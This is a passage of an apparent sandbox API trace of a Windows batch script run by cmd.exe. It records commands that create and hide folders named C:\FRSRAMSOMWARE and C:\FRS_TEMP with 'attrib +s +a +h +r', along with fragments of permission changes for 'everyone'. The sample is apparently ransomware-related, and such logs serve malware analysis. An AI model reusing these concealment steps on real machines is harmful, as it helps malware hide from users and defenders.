lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.892] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.892] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0036.892] GetLastError () returned 0x2 [0036.892] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.892] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd271a0 [0036.893] FindClose (in: hFindFile=0xd271a0 | out: hFindFile=0xd271a0) returned 1 [0036.893] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0036.893] GetLastError () returned 0x2 [0036.893] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd271a0 [0036.893] FindClose (in: hFindFile=0xd271a0 | out: hFindFile=0xd271a0) returned 1 [0036.893] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.893] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.893] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.893] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0036.893] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0036.893] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0036.894] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0036.894] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0036.894] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0036.894] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0036.894] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0036.894] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0036.894] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0036.894] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0036.894] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0036.894] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0036.894] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0036.894] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0036.894] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0036.894] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0036.894] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0036.894] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0036.894] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0036.894] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0036.894] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0036.894] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0036.894] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0036.894] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0036.894] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0036.894] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0036.894] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0036.894] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0036.894] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0036.894] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0036.894] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0036.894] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0036.894] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0036.894] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0036.894] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0036.894] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0036.894] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0036.894] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0036.894] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0036.894] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0036.894] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0036.894] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0036.894] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0036.894] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0036.894] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0036.894] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0036.894] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0036.894] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0036.894] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0036.894] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0036.894] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0036.894] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0036.894] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0036.894] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0036.894] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0036.894] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0036.894] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0036.894] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0036.895] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0036.895] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0036.895] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0036.895] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0036.895] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0036.895] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0036.895] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0036.895] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0036.895] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0036.895] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0036.895] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0036.895] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0036.895] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0036.895] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0036.895] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0036.895] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0036.895] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0036.895] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0036.895] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0036.895] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0036.895] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0036.895] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0036.895] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0036.895] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0036.895] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0036.895] _wcsicmp (_String1="attrib", _String2="FOR") returned -5 [0036.895] _wcsicmp (_String1="attrib", _String2="IF") returned -8 [0036.895] _wcsicmp (_String1="attrib", _String2="REM") returned -17 [0036.895] _wcsnicmp (_String1="attr", _String2="cmd ", _MaxCount=0x4) returned -2 [0036.895] SetErrorMode (uMode=0x0) returned 0x0 [0036.895] SetErrorMode (uMode=0x1) returned 0x0 [0036.895] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd181e8, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0036.895] SetErrorMode (uMode=0x0) returned 0x1 [0036.895] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.895] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.895] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.895] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.896] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0036.896] GetLastError () returned 0x2 [0036.896] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.896] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd16938 [0036.896] FindClose (in: hFindFile=0xd16938 | out: hFindFile=0xd16938) returned 1 [0036.896] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0036.896] GetLastError () returned 0x2 [0036.896] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd16938 [0036.896] FindClose (in: hFindFile=0xd16938 | out: hFindFile=0xd16938) returned 1 [0036.896] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.896] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.896] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.896] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0036.896] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0036.896] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.896] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.896] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.896] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.897] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.897] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.897] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +s +a +h +r C:\\FRSRAMSOMWARE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +s +a +h +r C:\\FRSRAMSOMWARE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="attrib +s +a +h +r C:\\FRSRAMSOMWARE", lpProcessInformation=0xc8ea3c*(hProcess=0x8c, hThread=0x80, dwProcessId=0x810, dwThreadId=0x5f8)) returned 1 [0036.975] CloseHandle (hObject=0x80) returned 1 [0036.975] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.975] GetEnvironmentStringsW () returned 0xd1b020* [0036.976] FreeEnvironmentStringsA (penv="=") returned 1 [0036.976] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0037.014] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0037.014] CloseHandle (hObject=0x8c) returned 1 [0037.015] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0037.015] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0037.015] GetEnvironmentStringsW () returned 0xd2c4f8* [0037.015] FreeEnvironmentStringsA (penv="=") returned 1 [0037.015] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0037.015] GetEnvironmentStringsW () returned 0xd2c4f8* [0037.015] FreeEnvironmentStringsA (penv="=") returned 1 [0037.015] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0037.015] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.015] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.015] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.015] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.015] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.015] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.016] SetConsoleInputExeNameW () returned 0x1 [0037.016] GetConsoleOutputCP () returned 0x1b5 [0037.016] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.016] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.016] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c [0037.016] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.016] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.016] SetFilePointer (in: hFile=0x8c, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0037.016] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0037.017] ReadFile (in: hFile=0x8c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x50b, lpOverlapped=0x0) returned 1 [0037.017] SetFilePointer (in: hFile=0x8c, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0037.017] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 16 [0037.017] GetFileType (hFile=0x8c) returned 0x1 [0037.017] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.017] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0037.017] _wcsicmp (_String1="md", _String2=")") returned 68 [0037.017] _wcsicmp (_String1="FOR", _String2="md") returned -7 [0037.017] _wcsicmp (_String1="FOR/?", _String2="md") returned -7 [0037.017] _wcsicmp (_String1="IF", _String2="md") returned -4 [0037.017] _wcsicmp (_String1="IF/?", _String2="md") returned -4 [0037.017] _wcsicmp (_String1="REM", _String2="md") returned 5 [0037.017] _wcsicmp (_String1="REM/?", _String2="md") returned 5 [0037.017] _tell (_FileHandle=3) returned 1395 [0037.017] _close (_FileHandle=3) returned 0 [0037.017] _wcsicmp (_String1="md", _String2="DIR") returned 9 [0037.017] _wcsicmp (_String1="md", _String2="ERASE") returned 8 [0037.017] _wcsicmp (_String1="md", _String2="DEL") returned 9 [0037.017] _wcsicmp (_String1="md", _String2="TYPE") returned -7 [0037.017] _wcsicmp (_String1="md", _String2="COPY") returned 10 [0037.017] _wcsicmp (_String1="md", _String2="CD") returned 10 [0037.018] _wcsicmp (_String1="md", _String2="CHDIR") returned 10 [0037.018] _wcsicmp (_String1="md", _String2="RENAME") returned -5 [0037.018] _wcsicmp (_String1="md", _String2="REN") returned -5 [0037.018] _wcsicmp (_String1="md", _String2="ECHO") returned 8 [0037.018] _wcsicmp (_String1="md", _String2="SET") returned -6 [0037.018] _wcsicmp (_String1="md", _String2="PAUSE") returned -3 [0037.018] _wcsicmp (_String1="md", _String2="DATE") returned 9 [0037.018] _wcsicmp (_String1="md", _String2="TIME") returned -7 [0037.018] _wcsicmp (_String1="md", _String2="PROMPT") returned -3 [0037.018] _wcsicmp (_String1="md", _String2="MD") returned 0 [0037.018] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0037.018] _wcsicmp (_String1="md", _String2="DIR") returned 9 [0037.018] _wcsicmp (_String1="md", _String2="ERASE") returned 8 [0037.018] _wcsicmp (_String1="md", _String2="DEL") returned 9 [0037.018] _wcsicmp (_String1="md", _String2="TYPE") returned -7 [0037.018] _wcsicmp (_String1="md", _String2="COPY") returned 10 [0037.018] _wcsicmp (_String1="md", _String2="CD") returned 10 [0037.018] _wcsicmp (_String1="md", _String2="CHDIR") returned 10 [0037.018] _wcsicmp (_String1="md", _String2="RENAME") returned -5 [0037.018] _wcsicmp (_String1="md", _String2="REN") returned -5 [0037.018] _wcsicmp (_String1="md", _String2="ECHO") returned 8 [0037.018] _wcsicmp (_String1="md", _String2="SET") returned -6 [0037.018] _wcsicmp (_String1="md", _String2="PAUSE") returned -3 [0037.018] _wcsicmp (_String1="md", _String2="DATE") returned 9 [0037.018] _wcsicmp (_String1="md", _String2="TIME") returned -7 [0037.018] _wcsicmp (_String1="md", _String2="PROMPT") returned -3 [0037.018] _wcsicmp (_String1="md", _String2="MD") returned 0 [0037.018] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0037.019] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.019] GetFullPathNameW (in: lpFileName="C:\\FRS_TEMP", nBufferLength=0x104, lpBuffer=0xc8e6a0, lpFilePart=0xc8e69c | out: lpBuffer="C:\\FRS_TEMP", lpFilePart=0xc8e69c*="FRS_TEMP") returned 0xb [0037.019] CreateDirectoryW (lpPathName="C:\\FRS_TEMP" (normalized: "c:\\frs_temp"), lpSecurityAttributes=0x0) returned 1 [0037.019] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.019] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0037.019] _get_osfhandle (_FileHandle=1) returned 0x28 [0037.019] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0037.019] _get_osfhandle (_FileHandle=0) returned 0x24 [0037.019] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0037.020] SetConsoleInputExeNameW () returned 0x1 [0037.020] GetConsoleOutputCP () returned 0x1b5 [0037.020] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0037.020] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.020] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c [0037.021] _open_osfhandle (_OSFileHandle=0x8c, _Flags=8) returned 3 [0037.021] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.021] SetFilePointer (in: hFile=0x8c, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0037.021] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0037.021] ReadFile (in: hFile=0x8c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x4fb, lpOverlapped=0x0) returned 1 [0037.021] SetFilePointer (in: hFile=0x8c, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0037.021] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n\n /d everyone\r\nd everyone\r\n\n\r\n=%%i\r\n") returned 32 [0037.021] GetFileType (hFile=0x8c) returned 0x1 [0037.021] _get_osfhandle (_FileHandle=3) returned 0x8c [0037.021] SetFilePointer (in: hFile=0x8c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0037.021] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0037.021] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0037.021] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0037.021] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0037.021] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0037.021] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0037.021] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0037.021] _tell (_FileHandle=3) returned 1427 [0037.022] _close (_FileHandle=3) returned 0 [0037.022] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0037.022] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0037.022] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0037.022] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0037.022] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0037.022] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0037.022] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0037.022] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0037.022] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0037.022] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0037.022] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0037.022] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0037.022] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0037.022] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0037.022] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0037.022] _wcsicmp (_String1="attrib", 